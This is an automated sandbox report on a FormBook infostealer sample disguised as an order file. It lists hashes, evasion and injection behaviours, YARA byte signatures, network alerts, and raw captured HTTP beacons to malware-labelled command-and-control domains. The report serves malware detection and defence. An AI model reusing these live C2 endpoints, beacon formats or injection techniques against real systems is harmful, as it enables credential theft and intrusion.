Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MV Sunshine, ORDER.exe

Overview

General Information

Sample name:MV Sunshine, ORDER.exe
Analysis ID:1491394
MD5:fbc68c0b27f383eeb5177a01d2464b74
SHA1:33ce6d297f5039c828f21d17c1ac6acde4b0153c
SHA256:8dddd8491db05ec4904bb6b6fd63ac5412b23fd89cefbf1b3c5ca74325615e8e
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • MV Sunshine, ORDER.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe" MD5: FBC68C0B27F383EEB5177A01D2464B74)
    • svchost.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QAjjirwAoAEExvw.exe (PID: 2700 cmdline: "C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7544 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • QAjjirwAoAEExvw.exe (PID: 2008 cmdline: "C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7868 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine, ORDER.exe, ParentProcessId: 7416, ParentProcessName: MV Sunshine, ORDER.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ProcessId: 7432, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine, ORDER.exe, ParentProcessId: 7416, ParentProcessName: MV Sunshine, ORDER.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ProcessId: 7432, ProcessName: svchost.exe
            Timestamp:2024-08-12T05:15:56.156882+0200
            SID:2855464
            Severity:1
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:25.278013+0200
            SID:2050745
            Severity:1
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:14:43.637779+0200
            SID:2855464
            Severity:1
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:49.902471+0200
            SID:2050745
            Severity:1
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:23.205204+0200
            SID:2855464
            Severity:1
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:14.267045+0200
            SID:2855464
            Severity:1
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:13:46.967798+0200
            SID:2855464
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:42.288965+0200
            SID:2855464
            Severity:1
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:12:53.078148+0200
            SID:2050745
            Severity:1
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:15:11.733973+0200
            SID:2855464
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:17.398800+0200
            SID:2050745
            Severity:1
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:14.936864+0200
            SID:2855464
            Severity:1
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:13:52.142938+0200
            SID:2855464
            Severity:1
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:39.937120+0200
            SID:2855464
            Severity:1
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:54.456190+0200
            SID:2855464
            Severity:1
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:25.748333+0200
            SID:2855464
            Severity:1
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:47.365213+0200
            SID:2855464
            Severity:1
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:48.710219+0200
            SID:2050745
            Severity:1
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:42.469573+0200
            SID:2855464
            Severity:1
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:04.076895+0200
            SID:2050745
            Severity:1
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:14:16.660530+0200
            SID:2855464
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:02.090377+0200
            SID:2050745
            Severity:1
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:14:21.740501+0200
            SID:2855464
            Severity:1
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:19.207640+0200
            SID:2855464
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:58.646857+0200
            SID:2855464
            Severity:1
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:36.645488+0200
            SID:2050745
            Severity:1
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:14:46.413561+0200
            SID:2855464
            Severity:1
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:28.296861+0200
            SID:2855464
            Severity:1
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:56.999620+0200
            SID:2855464
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:12.321101+0200
            SID:2855464
            Severity:1
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:41.119684+0200
            SID:2855464
            Severity:1
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:13:54.608641+0200
            SID:2050745
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:30.835820+0200
            SID:2050745
            Severity:1
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:37.390178+0200
            SID:2855464
            Severity:1
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:09.208803+0200
            SID:2855464
            Severity:1
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:13:30.987934+0200
            SID:2050745
            Severity:1
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-12T05:16:09.779223+0200
            SID:2855464
            Severity:1
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:14:59.550719+0200
            SID:2855464
            Severity:1
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:13:49.494279+0200
            SID:2855464
            Severity:1
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:16:01.197323+0200
            SID:2855464
            Severity:1
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-12T05:15:44.839054+0200
            SID:2855464
            Severity:1
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6hAvira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=Avira URL Cloud: Label: malware
            Source: www.sandranoll.comVirustotal: Detection: 10%Perma Link
            Source: www.anuts.topVirustotal: Detection: 7%Perma Link
            Source: MV Sunshine, ORDER.exeReversingLabs: Detection: 36%
            Source: MV Sunshine, ORDER.exeVirustotal: Detection: 30%Perma Link
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: MV Sunshine, ORDER.exeJoe Sandbox ML: detected
            Source: MV Sunshine, ORDER.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAjjirwAoAEExvw.exe, 00000002.00000000.1797929729.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4132539420.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009E4696
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009EC9C7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EC93C FindFirstFileW,FindClose,0_2_009EC93C
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF200
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF35D
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EF65E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3A2B
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3D4E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EBF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028CBC20 FindFirstFileW,FindNextFileW,FindClose,3_2_028CBC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax3_2_028B9870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h3_2_0464053E
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009F25E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
